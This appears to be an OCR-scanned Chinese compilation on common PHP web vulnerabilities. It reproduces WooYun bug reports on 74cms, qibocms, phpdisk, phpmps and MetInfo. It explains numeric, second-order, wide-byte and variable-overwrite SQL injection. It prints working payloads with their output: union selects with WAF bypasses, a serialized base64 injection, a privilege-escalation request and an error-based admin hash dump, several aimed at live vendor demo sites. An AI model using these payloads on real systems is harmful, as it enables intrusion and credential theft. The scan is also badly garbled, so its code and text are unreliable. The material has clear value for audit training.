且 key 默 认 是 空 的 导致 可 以 通过 验证 。 

例子 : WooYun: phpmps 注入 (可 修改 其 他 用 户 密码 ,官网 成 功 ) // phpmps uc 致 注入 


例子 : WooYun: PHPEMS (在 线 考 试 系统 ) 设计 缺陷 Getshell 一 枚 (官网 已 shell) 
/phpems uc 致 getshell 


例子 : WooYun: 最 土 团 购 注 入 一 枚 可 直接 提升 自己 为 管理 & 无 限 刷 钱 。// 最 土 团 购 
chinabank 致 注入 


例子 : WooYun: Destoon Sql 注 入 漏洞 2 (有 条 件 ) //destoon tenpay 致 注入 
例子 : WooYun: CSDJCMS 程 式 舞 曲 最 新 版 Sql 一 枚 //csdj tenpay 致 注入 


数字 型 注入 


其 实 也 不 只 是 数字 型 只 是 说 一 些 忘记 加 单 引 号 的 地 方 都 这 样 。 
只 是 一 般 数字 型 的 都 不 会 加 单 引号 的 。 
一 般 的 是 


$id-$ GET[id]; 
Select * from table where id-$id; 


$id 没 被 单 引 号 且 没有 被 强制 类 型 转换 那么 就 算 addslashes 了 由 于 不 需要 去 闭合 
单 引 号 所 以 也 无 影响 。 


例子 : WooYun: qibocms 地 方 门户 系统 注入 #3 (demo 测 试 ) 


并 不 是 一 些 数字 型 一 些 其 他 的 点 也 有 些 忘 记 加 单 引 号 导致 了 注入 。 例子 : 
WooYun: Supesite ìf £ +A #3 (Delete) 


这 里 Supesite 的 注入 还 涉及 到 了 一 个 设计 缺陷 。 这 里 把 


$query = $ SGLOBAL['db']-»query('SELECT * FROM '" .tname('SspacetagSs 








$itemid 首先 带 入 到 了 查询 当中 是 被 单 引 号 了 的 。。 如 果 查 询 出 来 的 有 结果 TAH 
入 到 delete 中 如 果 无 结果 就 不 执行 delete 的 语句 了 。 而 在 数据 库 中 itemid 中 存储 的 
是 int 类 型 所 以 他 这 里 本 意 是 想 要 用 户 只 能 提交 数字 型 才能 查询 出 结果 。 如 果 不 是 
提交 的 数字 的 话 那么 就 查询 不 出 来 结果 就 不 去 执行 下 面 的 delete 语 名 了 。 但 是 由 于 
mysql 的 类 型 转换 因为 他 这 里 储存 的 是 int 类 型 所 以 我 们 提交 4xxxxx 跟 我 们 提交 4 是 
一 样 的 


$_SGLOBAL['db']->query('DELETE FROM '.tname('spacetags').' WHERE i! 
[| 
然后 就 执行 这 个 delete 语 句 然后 没 单 引号 造成 了 注入 。 


例子 : WooYun: phpyun v3.2 (20141226) 两 处 注入 。 





这 个 phpyun 的 注入 主要 是 因为 php 是 弱 类 型 语言 
一 些 厂商 总 欢 这 样 写 


If ($a>1){ 
Mysql_query(select id from table where id=$a) 


他 这 个 本 来 是 想 用 户 提交 数字 才能 通过 这 个 判断 但 是 由 于 弱 语 言 1+asd 哈 的 都 能 
通过 所 以 又 导致 了 注入 。 


二 次 注入 


也 是 一 种 比较 常见 的 注入 。 涉及 到 的 是 入 库 和 出 库 。 因 为 有 全 局 转 义 然后 入 库 的 
时 候 


Insert into table (username) values ('a\''); 


这 样 入 库 后 转 义 符 就 会 消失 那么 就 是 a' 如 果 哪 里 再 把 这 个 查询 出 来 那么 也 就 是 出 
库 的 是 a' 如 果 再 把 出 库 的 再 带 入 到 了 查询 啥 的 那么 就 再 次 成 功 的 引入 了 单 引 号 导 
致 了 注入 


例子 : WooYun: phpyun v3.2 (20141226) 两 处 注入 。 例子: WooYun: gibocms 地 方 
门户 系统 二 次 注入 #5(demo 测 试 ) 例子 : WooYun: 74cms (20140709) 二 枚 二 次 注入 
例子 : WooYun: Hdwiki 最 新 版 二 次 注入 一 枚 


比较 是 硬 伤 的 是 很 多 时 候 数据 库 中 存储 的 长 度 是 有 限制 的 。 所 以 一 些 也 不 是 太 好 
TI è 


查询 当中 key 可 控 


不 知道 也 应 不 应 该 把 这 个 归 为 一 类 。 

大 概 是 因为 一 些 查询 的 时 候 直接 把 $_POST 哈 的 直接 带 入 到 了 查询 函数 当中 
例如 cmseasy 的 rec_insert 的 查询 元 数 中 。 

然后 foreach key 出 来 然后 foreach 出 来 的 key 做 了 查询 中 的 column 


这 种 的 防止 方法 一 般 是 把 数据 库 中 的 column 查 询 出 来 然后 in_array 判断 一 下 
$_POST 出 来 的 key 是 否 在 数据 库 中 的 column 中 下 面 两 个 例子 就 是 这 样 修复 的 。 


例子 : WooYun: 云 人 才 系 统 SQL 注入 ， 绕 过 WAF 例子 : WooYun: Cmseasy SQL E 
射 漏 洞 之 三 


striplashes 


有 些 cms 在 全 局 addslashes 后 然后 在 后 面 的 文件 中 又 stripslashes 去 掉 了 转 义 符 然 
后 又 可 以 闭合 单 引 号 了 。 


$ SESSION['flow consignee'] = stripslashes deep($consignee); 


例子 : http://www.2cto.com/Article/201301/182509.html /之 前 的 ecshop 注 入 。 


截取 字符 导致 的 注入 


有 些 cms 有 的 时 候 会 限制 用 户 输 入 的 长 度 
所 以 只 截取 一 部 分 
例如 uchome 的 cutstr($asd,32); 


这 样 只 允许 输入 32 个 字符 而 且 Uuchome 里 面 的 这 个 也 没有 像 dz 那样 截取 字符 的 后 面 
Jm... 


那么 如 果 我 们 提交 一 个 1111111111111111111111111111111 


被 转 义 后 成 1111111111111111111111111111111V 
然后 截取 32 个 字符 就 是 111111111111111111111111111111 个 


如 果 又 是 double query 的 话 吃 掉 一 个 单 引 号 然后 下 一 个 连 着 的 可 控 变量 又 可 以 注入 


结果 在 uchome 中 找到 了 个 能 引入 转 义 符 的 结果 只 有 一 个 可 控 的 。 


例子 : WooYun: Hdwiki (20141205) 存在 7 处 SQL 注 入 漏洞 ( 含 之 前 处 理 不 当 安 全 的 
漏洞 ) // 里 面 的 0x06 


绕 过 限制 继续 注册 GLOBALS 交 量 


不 知道 放 哪 。 这 个 也 放 到 注入 板块 来 把 。。 
其 实 就 是 这 次 的 DZ6.X 7.X 那个 任意 代码 执行 的 漏洞 


if (isset($ REQUEST['GLOBALS']) OR isset($ FILES['GLOBALS'])) { 
exit('Request tainting attempted.'); 


} 

foreach(array('_COOKIE', '_POST', '_GET') as $_request) { 
foreach($$ request as $ key => $ value) { 

$ key(0) != ' ' && $$ key = daddslashes($ value); 


} 
} 


主要 关键 代码 就 上 面 这 两 段 。 这 里 把 GET POST COOKIE 循环 出 来 然后 注册 一 个 
变量 但 是 这 里 不 允许 创建 GLOBALS 变 量 然后 DZ7.X 就 是 用 这 样 处 理 的 如 果 设 置 
了 REQUEST 的 GLOBALS 


就 直接 退出 

这 段 代 码 在 很 久 以 前 确实 是 没什么 问题 

为 那 时 候 的 request order 还 是 gpc 

但 是 在 php 5.3 以 后 request order 默认 成 了 gp 

也 就 是 成 了 get 和 Post 不 包含 cookie 了 。 

所 以 $ REQUEST 里 面 就 不 包含 COOKIE 提 交 来 的 了 。 

而 且 这 后 面 也 把 COOKIE 循 环 出 来 注册 变量 

所 以 这 里 我 们 在 COOKIE 里 面 提交 GLOBALS 就 不 会 被 检测 出 来 了 。 
而 且 也 成 功 注 册 了 GLOBALS 变 量 。 


所 以 在 结合 后 面 的 一 些 些 代码 就 造成 了 代码 执行 。 
例子 : WooYun: Discuz! 某 两 个 版 本 前 台 产 品 命令 执行 (无需 登录 ) 


以 上 就 差不多 是 我 经 常 所 遇 到 的 注入 问题 好 像 暂时 也 想不到 其 他 什么 的 了 


WooYun-2014-63225 : 74cms 也 新 版 注入 8-9 


z 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-063225 


简要 描述 


骑士 PHP 人 才 系 统 : 74cms V3.4.20140530 


详细 说 明 

GBK 2 字 节 一 汉字 UTF8 三 字 节 一 汉字 。 

74cms 在 读 取 数据 库 的 时 候 character_set_client=binary 
这 样 没 办 法 来 直接 宽 字 节 来 注入 了 。 

得 找 一 些 转换 编码 的 地 方 。 

$8 从 UTF8 转 成 GBKZ ERT %e5%5c 

74cms 对 GET POST COOKIE ...... 都 做 了 addslashes 
所 以 ' 转 义 后 为 \ 

->%5C 96e5965c965c' 两 个 \ 则 单 引号 出 来 

再 看 看 74cms 的 全 局 过 滤 


function remove_xss($string) { 

$string = preg replace('/[Nx00-Nx08NXxOBNXOCNXOE -NXA1FNXx7F]-*/S', 
$parmi = Array('javascript', 'vbscript', 'expression', 'applet 
$parm2 = Array('onabort', 'onactivate', 'onafterprint', 'onaft: 
$parm = array merge($parmi1, $parm2); 
for ($i = 0; $i < sizeof($parm); $i++) { 

$pattern = '/'; 

for ($j = 0; $j < strlen($parm[$i]); $j++) { 


if ($j > 0) { 


$pattern .= '('; 
$pattern .= '(&#[x|x]o([9][a][b]);?)?'; 
$pattern .= '|(&#0([9][10][13]);?)?'; 
$pattern .= ')?'; 
} 
$pattern .= $parm[$i] [$j]; 
} 
$pattern -= ii; 


$string = preg_replace($pattern, '', $string); 


} 
return $string; 
‘| RE 


是 开启 了 i 修正 符 的 所 以 不 能 用 大 小 写 绕 过 但 是 利用 清空 uniounionn 等 都 行 。 





第 八 处 : plus/ajax_common.php 中 


elseif ($act=="hotword" ) 


{ 
if (empty($ GET['query'])) 
{ 
exit(); 
j 
$gbk query-trim($ GET['query']); 
if (strcasecmp(QISHI DBCHARSET, "utf8") !=0) 
{ 
$gbk_query=iconv("utf-8", QISHI_DBCHARSET, $gbk_query); 
j 
$sql-"SELECT * FROM ".table('hotword')." WHERE w word like '%{s 
$result = $db->query($sql); 
while($row = $db->fetch_array($result ) ) 
{ 
$1ist[]2"'".$row['w word']."'"; 
j 
if ($list) 
{ 
$liststr=implode(',',$list); 
$str="{"; 
$str.="query: '{$gbk_query}',"; 
$str.="suggestions:[{$liststr}]"; 
$str.="}"; 
‘| ay 








转 码 后 直接 带 入 查询 而 且 直 接 输出 。 





X xb 5b "c gH Au X, A 

测试 一 下 有 demo 虽然 有 安全 狗 但 是 能 绕 过 。 

4 LoadURL |http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=aa%%E9%8C%4A6%27%20uniunionon%20/*!50000select*/%201,user%28%29,3%23 E 
[i] " 十 
Split URL 


(Execute is) 


Execute current URL 


E Enable Post data | | Enable Referrer 


Íquery:' aaWÉfBV union /*!50000select*/ 1, user O, 3^ , suggestions: [' root@localhost’ J} 


www.wooyun.org 


第 9 处 £plus/ajax_officebuilding.php ? 





elseif($act == 'key') 


{ 
$key-trim($ GET['key']); 
if (!empty($key)) 
{ 
if (strcasecmp(QISHI_DBCHARSET, "utf8")!=0) $key=iconv("utf-8", ( 
$result = $db->query("select * from ".table('category')." where 
while($row = $db->fetch_array($result ) ) 
{ 
if ($listtype=="1i") 
{ 
$htm.-"«li title=\"{$row['c_name']}\" id=\"{$row[ 'c_id']}* 
j 
else 
{ 
$ GET['officebuildingid']-$row['c id']; 
$url-url rewrite('QS officebuilding',$ GET); 
$htm.="<li><a href=\"{$url}\" title=\"{$row['c_note']}\" c: 
j 
j 
if (empty($htm)) 
| 





转换 编码 后 直接 带 入 到 查询 中 然后 直接 输出 


测试 一 下 demo 


论 PHP 常见 漏洞 





e [?] demo.74cms.com/ /plus/ajax, afficebuilding.php?act -key&key- asd$' /*!S0000 Ell cj | sg 








月 | 00 |-) | 会 | | 
访问 最 多 ©) EasyTalk Administrato.. $% 90sec 信 息 安 全 小 组 KI Exploit-DB 漏 洞 公布 (7) EasyTalk Administrato.. EB 1337Day |^) 90secTools [S] 国内 SeBug 
INT | = @ SQL XSS- Encryptiony Encodingy Other- 


») Execute 





lj Load URL | http:/. [demo.74cms.com/| {plus/aiax_officebuilding, php?act=key&key=asd%EI%BC%AG%27 [*I5000Dunicunionn */ li *150000select*/ 
D spit URL 1,2,3,user(),5,6,7,version()| 9 %23 














Enable Post data 











Enable Referrer 
è root@localhost5. 0. 45-commmity-nt 








www.wooyun. org 


漏洞 十 明 
见 上 面 。 


> 


A ee =e 
修复 方案 


注意 转 码 的 安全 问题 。 


WooYun-2014-63225 : 74cms 最 新 版 注入 8-9 64 


WooYun-2014-55842 : qibocms 下 载 系统 SQL 注 
AK (FMT EH ) 


Y 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-055842 


简要 描述 
过 滤 不 严 。 
或 许 qibo 上 的 其 他 的 系统 也 还 存在 这 个 洞 不 过 我 没 细 看 。 表示 也 不 清楚 。 


详细 说 明 

刚 从 章 博 官网 上 面 下 了 几 个 系统 下 来 看 看 。 

首先 先 说 一 下 企业 系统 和 黄页 系统 、 上 次 我 在 乌云 发 了 两 个 类 似 的 洞 
虽然 官方 是 在 论坛 上 发 布 补丁 了 。 


在 首页 上 把 b2b 系 统 的 文件 更 新 了 ,但 是 在 主页 上 并 没有 更 新 企业 系统 和 黄页 系统 
这 两 个 类 似 的 漏洞 文件 。 


下 载 系统 。 
在 download/s_rpc.php 中 


<?php 
require(dirname(__FILE__).'/global.php'); 
header('Content-Type: text/html; charset=gb2312'); 
require once(ROOT PATH."inc/class.chinese.php"); 
$cnvert - new Chinese("UTF8","GB2312",$ POST['queryString'],ROOT P/ 
$ POST['queryString'] = $cnvert-»ConvertIT(); 
$queryString = $ POST['queryString']; 
if(strlen($queryString) »0) { 
$query = $db->query("SELECT title FROM ($ prelarticle WHERE 1 
while ($result = $db->fetch_array($query)) { 


echo "<li onClick="fill(\’’.$result[title].’\");">".s 





虽然 全 局 转 义 不 过 有 


$cnvert = new Chinese("UTF8","GB2312",$ POST['queryString'],ROOT P/ 
$ POST['queryString'] = $cnvert-»ConvertIT(); 


$queryString - $ POST['queryString']; 
E = g 





这 个 就 可 以 来 宽 字 节 了 。 

在 我 看 的 qibo 官 网 上 的 那些 系统 有 些 过 滤 了 这 个 不 过 这 个 系统 没有 过 滤 。 
我 也 没 看 完 不 清楚 其 他 系统 过 滤 没 。 

然后 直接 带 入 了 查询 输出 。 


Hey i] “LE PA 


it PHP 常见 漏洞 











INT |æ ẹ SQL: XSS- Encryption" Encoding: Other- 
4m Load URL  |http://127.0.0.1/QIBOdown/download/s rpc.php 
Q Split URL 

^) Execute 











[V] Enable Post data [E] Enable Referrer 
Post data queryString=aa%df' union select user()%23 














e root@localhost 


www.wooyun.org 
本 地 测试 成 功 
测试 一 下 官网 











INT y|o @ SQL: XSS- Encryption" Encodingy Other- 


4m Load URL  |http://download.qibosoft.com/download/s rpc.php 
Q Split URL 


[V] Enable Post data [fj Enable Referrer 


Post data queryString=aa%df' unior 

















select user( )%23 











e download?localhost 





www.wooyun.org 


官网 测试 成 功 有 图 ARH o 


5 lu 
修复 方案 
来 过 滤 。 
求 20 分 。 
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WooYun-2014-53187 : qibocms B2b 注入 一 枚 


= 
漏洞 作者 : ' 雨 。 V 


来 源 http://www.wooyun.org/bugs/wooyun-2014-053187 


简要 描述 


在 wooyun 上 看 了 看 qibo。 忽略 了 全 部 xss. 那 我 就 不 提 Xss 了 。 
来 几 枚 注入 ， 求 不 忽略 可 好 ? 


详细 说 明 


B2B 系 统 。 


在 news/js.php 中 


f($type=='hot' ||$type=='com' | | $type=='new' | |$type 


{ 


if($f_ id) 


{ 


else 


if(is numeric($f id))( 


$SQL="_ fid-$f id "; 


selse{ 


$detail=explode(",",$f_id); 


lastview' | |$tyj 


$SQL=" fid IN ( " implode(",",$detail)." ) Ns 


$SQL=" 1 LE p 


} 


if($type=='com' ) 


{ 
$SQL.=" AND levels=1 "; 
$ORDER=' list '; 
$_INDEX=" USE INDEX ( list ) "; 
j 
elseif($type--'hot') 
{ 
$ORDER=' hits '; 
$_INDEX=" USE INDEX ( hits ) "; 
j 
elseif ($type=='new' ) 
{ 
$ORDER=' list '; 
$_INDEX=" USE INDEX ( list ) "; 
} 
elseif ($type=='lastview' ) 
{ 
$ORDER=' lastview '; 
$_INDEX=" USE INDEX ( lastview ) "; 
j 
elseif($type--'like') 
{ 


$SQL.=" AND id!='$id' "; 


if(!$keyword) 


extract($db->get_one("SELECT keywords AS keyword FROM - 
j 
if ($keyword) { 

$SQL.=" AND ( "; 

$keyword=urldecode($keyword) ; 

$detail=explode(" ",$keyword); 

unset ($detail2); 


foreach( $detail AS $key=>$value) { 


$detail2[]=" BINARY title LIKE '%$value%' "; 


, 


j 
$str-implode(" OR ",$detail2); 
$SQL.=" $str ) "; 
selse{ 
$SQL.=" AND © "; 
CE 





看 到 keyword 解码 了 。 所 以 无 视 了 全 局 的 转 义 了 。 
然后 用 空格 来 切割 。 

就 不 能 用 空格 了 。 

官网 测试 成 功 。 


漏洞 证 明 


Load URL http://b2b.qgibosoft.com/news/js.php?type=like&keyword=123%%2527 %29/**/union/**/select/**/1,user 
Spit URL %28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 
= % 


a 


se 


Execute 
[E] Enable Post data [E] Enable Referrer 


document. write( v? b2b&localhost 
*). ——_—_— 


www.wooyun.org 


论 PHP 常见 漏洞 


求 保养 
求 20. 


WooYun-2014-53187 : qibocms B2b 注入 一 枚 


71 


WooYun-2014-56822 : phpdisk V7 sql 注 入 2 


P 
a 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-056822 


简要 描述 
周末 回 家 EAR o 
刚 从 官网 上 面 下 载 的 。 
过 滤 不 严 。 


详细 说 明 
在 ajax.php 中 


case 'uploadCloud': 
$folder id = (int)gpc('folder id','P',0); 
$folder id = $folder id ? $folder id : -1; 
$data = trim(gpc('data', 'P','')); 
$is checked = $is public ? ($settings['check public file'] 
if($settings['all file share'])( 
$in share - 1; 


jelse( 


$in share = (int)@$db->result_first("select in share fi 
j 
if ($data) { 

$file_key = random(8); 

if(strpos($data,',')!==false){ 


$add sql = $msg = ''; 


= explode(',',$data); 


for($i=0; $i<count ($arr)-1;$it+) { 


$file = unserialize(base64_decode($arr[$i])); 
//print_r($file); 
//exit; 
$report_status =0; 
$report arr = explode(',',$settings['report woi 
if(count($report arr))(1 
foreach(S$report arr as $value)( 
if (strpos($file['file_name'], $value) 


$report_status = 2; 


} 


$num = @$db->result_first("select count(*) fror 


if($num && $file[file_id]){ 


$tmp ext = $file[file extension] ? '.'.$fi. 

$msg .- $file[file name].$tmp ext.','; 
jelse( 

$add sql .= "($file[file id],'$file[file n: 


if ($add_sql){ 


$add sql = is utf8() ? $add sql : iconv('utf-8 
$add sql = substr($add_sql,0, -1); 


$db->query_unbuffered("insert into {$tpf}files| 


j 
jelse( 
$file = unserialize(base64_decode($data) ); 
//write file(PHPDISK ROOT.'system/ax.txt',var expo! 
//print_r ($file); 


//exit; 


$num = @$db->result_first("select count(*) from {$1 





来 利用 下 面 的 这 个 else 里 面 的 来 注入 把 。 


lse{ 

$file = unserialize(base64 decode($data)); 

//write file(PHPDISK ROOT.'system/ax.txt',var expo! 

//print_r ($file); 

//exit; 

$num = @$db->result_first("select count(*) from {$1 
El _ : 
在 这 里 $data = trim(gpc('data',P',")); data 是 我 们 可 控 的 。 
虽然 全 局 转 义 但 是 在 这 里 会 对 他 进行 一 次 解码 


然后 对 他 先 解码 一 次 然后 再 反 序 列 一 次 。 





$file[file id] 
然后 将 这 个 就 带 入 了 查询 当中 、 


Come and sql it ° 


iy je] E AF] 
首先 在 本 地 对 语 名 进行 序列 化 然后 再 encode 一 次 得 到 


YToxoOntzOjc6ImZpbGVfaWQiO3M6MTk6ImFhJyBVTkIPTiBTRUxFQ1QgMSMiO 
30= 


这 里 我 直接 把 语句 输出 来 把 。 


$file = unserialize(base64_decode($data) ); 


//write file(PHPDISK ROOT.'system/ax.txt',var expo! 


//print_r ($file); 


//exit; 


$sql="select count(*) from {$tpf}files where yun f: 


echo $sql;exit; 


$num = @$db->result_first("select count(*) from {$1 





码 Load URL | http://127.0.0.1/phpdisk/ajax.php?action=uploadCloud 
th 


Split URL 
cs ente | 
[V] Enable Post data [E] Enable Referrer 
Post data data- YToxOntzOjc6ImZpbGVfaWQiO3M6M Tk6ImFhJyBV TKIP TiB TRUXFQ1QgMSMiO30- 


select count(*) from pd files where yun fid-'aa' UNION SELECT 1# and userid? 1’ 


看 这 语句 。 不 用 多 说 了 把 。 


5 > de 
修复 方案 


3 Sit. 


www.wooyun.org 


Madeira ie 53189 : qibocms 分 类 注入 一 枚 可 
提升 自己 为 管 


漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-053189 


简要 描述 
过 滤 不 严 。 可 修改 管理 的 密码 。 或 者 直接 提升 自己 为 管理 。 
求 不 忽略 可 好 ? 
详细 说 明 


qibocms 分 类 系统 。 
在 member/company.php 中 
$cpDB=$db->get_one("SELECT * FROM ‘{$pre}memberdata 1' WHERE uid-': 
if($step--2)( 
foreach( $ POST AS $key=>$value) { 
$ POST[$key]-filtrate($value); 

j 
Qextract($ POST); 
if(!$cpname) {showerr ("#3 4 #& 867] 72"); 
if(!$cptype)(showerr ("35 36 2$ 4 3205/5 " ) 5} 
if(!$cptrade)(showerr ("74 253€ BIL Pt BAT IL") ; } 
if(!$cpfounder)(showerr (" 4 3E iE AI RA E"); 
if(!$cptelephone) {showerr ("A 5] i$ 4 8&7) 7E"); 
if(!$cpaddress)(showerr("- 4] XE3ER AEA 7E") 5 


if(!$cpcity){showerr(" 请 选择 企业 所 在 城市 " ) 53 


if(!$cpcode) (showerr ( " 2122 JU N48 7 867] E"); ) 
if(!ereg("4[0-9]{8}", $cpcode) ){ 
shower r ("U EES 28 ZR JUI Ae"): // 如 果 不 想 严格 控制 机 构 码 
j 
if (!$cpDB) { 
$db->query("INSERT INTO ~{$pre}memberdata_1° ( “uid , 
$grouptype-$webdb[AutoPassCompany]?'1':'-1'; 
$db->query("UPDATE {$pre}memberdata SET grouptype-'$gr« 
refreshto("company.php?jobzedit", "你 的 资料 已 经 提交 " 1); 
jelse( 
$db->query("UPDATE {$pre}memberdata_1 SET cpname='$cpné 


refreshto("company.php?job=edit", "修改 成 功 ",1); 





这 里 有 一 枚 很 明显 的 变量 覆盖 extract 
就 来 覆盖 掉 表 前 级 然后 自己 补 全 语句 。 
可 以 看 到 后 面 还 有 一 个 update 的 。 

所 以 可 以 直接 提升 自己 为 管理 。 


漏洞 证 明 


x Load URL http://127.0.0.1/aibofenlei/member/company.php?job- edit ^ 
Split URL 4 


th 
db 
» Execute 
[V] Enable Post data Enable Referrer 
Post data 


pre-123&step-2&cpname-1&cptype-1&cptrade-1&cpfounder-1&cptelephone- 1&cpaddress- 1&cpcity- 1&cpcode-88888888&CpDB-1 


数据 库 连接 出 错 :UPDATE 123memberdata 1 SET 


cpname='1',cplogo=",cptype='1',cptrade='1',cpproduct=",cpcity='1',cpfoundtime=",cpfounder='1',cpmannum=",cpmoney=",cpcode='88888888',cppermit: 
WHERE uid='2' 


a 


Table 'qibofenlei.123memberdata 1' doesn't exist 
1146 





网 页 正在 跳 转 当中 ,请 稍 想 … ( 
修改 成 功 
n EH £n hi cad te sti G —hudbid- SE AB cii n 1 www.wooyun.ofg 
可 以 看 到 RABAT 表 前 级 。 
然后 补 全 语 钉 。 
- —— ÁHáNá— á— ———P 


© Load URL http://127.0.0.1/gibofenlei/member/company.php?job- edit 


X Spit URL 
Execute 

Enable Post data Enable Referrer 
Post data 


pre-'p8 memberdata' SET groupid=3 where groupid=8#&step=2&cpname=1&cptype=1 
cpcity- 1&cpcode-88888888&cpDB-1 





网 页 正在 跳 转 当中 ,请 稍 柜 -…. 
修改 成 功 


如 果 和 您 的 浏览 器 没 有 自动 跳 转 ,请 点 击 : 
WwWW-wooytun-org 








mysql> select groupid from p8 memberdata; 


rows in set (6.06 sec? 





x 


A rep 
修复 方案 
求 不 忽略 ? 
求 20. 


WooYun-2014-51734 : phpmps 注入 一 枚 


v 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-051734 


简要 描述 


详细 说 明 
在 member.php 


case 'check_info_gold': 
$json = new Services_JSON; 
extract($ REQUEST); 
$m gold = $db->getOne("select gold from {$table}member whet 
$data['kou'] = $CFG['info top gold'] * intval($number); 
$data['gold'] = $m gold - $data['kou']; 
$data-$json-»encode($data); 
echo $data; 


break; 





extract & € 3 & ° 


直接 履 盖 掉 $table 然后 补 全 语句 然后 注入 。 


漏洞 证 明 


x Load URL 


http://127.0.0.1/phpmps/member.php?act- check info gold&table-phpmps member where 1=yu and(select 1 from(select 
[i] 
db 


Split URL count(*),concat(floor(rand(0)*2),0x3a,(select(select( SELECT concat(username,0x3a,password)FROM phpmps admin limit 0,1))from information schema.tables 
2p limit 0,1))x from information schema.tables group by x)a) and 1719623 
^) Execute 


[E] Enable Post data | | Enable Referrer 


NySQL server error report:Array ( [0] => Array ( [message] => EySQL Query Error ) [1] => Array ( [sql] => sel: 
gold from phpmps member where l=yu and(select 1 from(select count (*), concat (floor(rand(0)*2), 0x3a, 

(select (select (SELECT concat (username, 0x3a, password)FROE phpmps admin limit 0,1))from information schema. tabl: 
limit 0,1))x from information schema. tables group by x)a) and 1=1#member where userid-'1' ) [2] => Array ( 


[error] => Duplicate entry '1:admin:21232f297a57a5aT43894a0e4a801fc3' for key 'group key ) [3] => Array ( 
[errno] => 1062 ) ) 


www.wooyun.org 


WooYun-2014-55338 : Metlnfo 最 新 版 (5.2.4) 一 处 
SQL 8 ix &iF] 


漏洞 作者 : Mody 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-055338 


简要 描述 
上 周三 挖 了 个 metinfo 的 后 台 文件 包含 ， 被 乌云 大 大 给 忽略 了 ， 好 吧 ， 
的 确 太 难 用 了 。。。 今 天 刚 挖 到 一 处 sq| 注 入 ， 就 屁 颠 屁 颠 的 来 乌云 提交 了 ， 求 乌云 


大 大 给 过 ， 我 不 要 继续 当 路 人 甲 阿 。。。 oe yaa aeq 
cncert f > 4535 IR] F > 那 还 有 通用 性 奖励 么 


WooYun 回 答 :有 |! 


详细 说 明 
借用 http://**.**.**.**/Jpugs/Wooyun-2010-043795 的 一 句 话 : 审计 代码 我 一 般 喜 欢 先 
看 核心 文件 


1. 来 看 核心 的 文件 admin/include/common.inc.php( 下 面 的 代码 有 我 自己 添加 的 调试 
代码 ) 


/* 
* added by mody 
* glocal register 
D 
//print '----------- global register---------- <br>'; 
foreach(array(' COOKIE', ' POST', '_GET') as $ request) { 
foreach($$ request as $ key => $ value) ( 
$ key(0) != ' ' && $$ key = daddslashes($ value,0,0,1); 
/* 
if(is array($$ key))( 
print '$'.$_key.'='; 
print_r($$_key); 


print '<br>'; 


} 
else print '$'.$_key.'='.$$_key.';<br>'; 
Bee 
} 
} 
//print '----------------------------------- <br>"; 


注册 全 局 变量 ， 可 以 看 到 所 有 的 变量 都 经 过 了 daddslashes() 过 滤 
2. &# A daddslashes() & 4 > # x: fFadmin/include/global.func.php 
/*POST 变 量 转 换 */ 
function daddslashes($string, $force = © ,$sql_injection =0,$url =( 
!defined('MAGIC QUOTES GPC') && define('MAGIC QUOTES GPC', get. 
if(!MAGIC QUOTES GPC || $force) { 


if(is_array($string)) { 


foreach($string as $key => $val) { 
$string[$key] = daddslashes($val, $force); 
j 
) else { 


$string = addslashes($string); 


j 
if(is_array($string) ){ 
if ($url) { 
//$string-''; 
foreach($string as $key => $val) ( 
$string[$key] = daddslashes($val, $force); 
j 
jelse( 
foreach($string as $key => $val) ( 


$string[$key] = daddslashes($val, $force); 


j 
selse{ 


if(SQL_DETECT!=1 || $sql_injection==1) { 
$string = str_ireplace("\"","/",$string); 
$string = str_ireplace("'","/",$string); 
$string = str ireplace("*","/",$string); 
$string = str ireplace("-","/",$string); 
$string = str ireplace("select", "\sel\ect", $string); 


$string = str_ireplace("insert", "\ins\ert", $string); 


$string = str_ireplace("update", "\up\date", $string); 
$string = str_ireplace("delete", "\de\lete", $string); 
$string = str_ireplace("union", "\un\ion", $string); 
$string = str_ireplace("into", "\in\to", $string); 
$string = str ireplace("load file", "\load\_\file", $s1 
$string = str_ireplace("outfile", "\out\file", $string 
$string = str_ireplace("sleep", "\sle\ep", $string); 
$string_html=$string; 
$string = strip_tags($string); 
if ($string_html!=$string) { 

$string=''; 
} 


$string = str_replace("%", "\%", $string); // 


} 


return $string; 


E 


可 以 看 到 ， 是 能 够 传递 array 变 量 进来 的 (前 人 台 的 include/include/global.func.php 不 


能 ) 


3. 注入 点 admin/content/feedback/export.php， 这 里 有 亮点 啊 





这 个 文件 包含 了 admin/include/common.inc.php， 但 是 却 没 有 进行 login_check， 所 
以 导致 这 个 文件 能 够 不 登录 直接 访问 。 如 下 : 


<?php 
# MetInfo Enterprise Content Management System 
# Copyright (C) MetInfo Co.,Ltd (http://**.**.**,**), All rights rt 
ob_start(); 
$depth='../'; 
require once $depth.'../include/common.inc.php'; 
ob clean(); 
ob start(); 
Eee el 
接着 他 进行 了 一 项 很 危险 的 操作 : 





foreach($settings_arr as $key=>$val){ 
if($val['columnid' ]==$class1) { 
$tingname =$val['name'].'_'.$val['columnid']; // 这 


$$val['name']-$$tingname; 





其 中 ,$settings_arr,$class1 都 可 以 在 common.inc.php 中 被 覆盖 ， 这 就 导致 可 以 构造 
一 定格 式 的 变量 (变量 名 必须 要 有 下 划 线 ) 


那么 ， 如 何 利 用 ， 我 们 来 找 下 面 的 Sql 语句 ， 总 共有 三 句 ， 找 第 一 句 即 可 


$query = "SELECT * FROM $met_parameter where module=8 and lang-'$1: 
//»»»»2it&*$met parameter; t$settings arr/&3& 203516 8) > TR SE E 
//print $query.'<br>'; 
//die(); 
$result = $db->query($query); 
while($list= $db->fetch_array($result ) ){ 
/* 
print '<br><br>$list='; 
print_r($1list); 
SY 
$feedbackpara[$list['id']]=$list; // 注意 这 里 的 Id 


$feedback para[]-$1ist; 


| = us 
WWW 





我 是 猥琐 的 poc (其 中 的 met admin_table 的 met 为 metinfo 自 定义 的 前 组， 可 以 用 户 
É E 3L) 


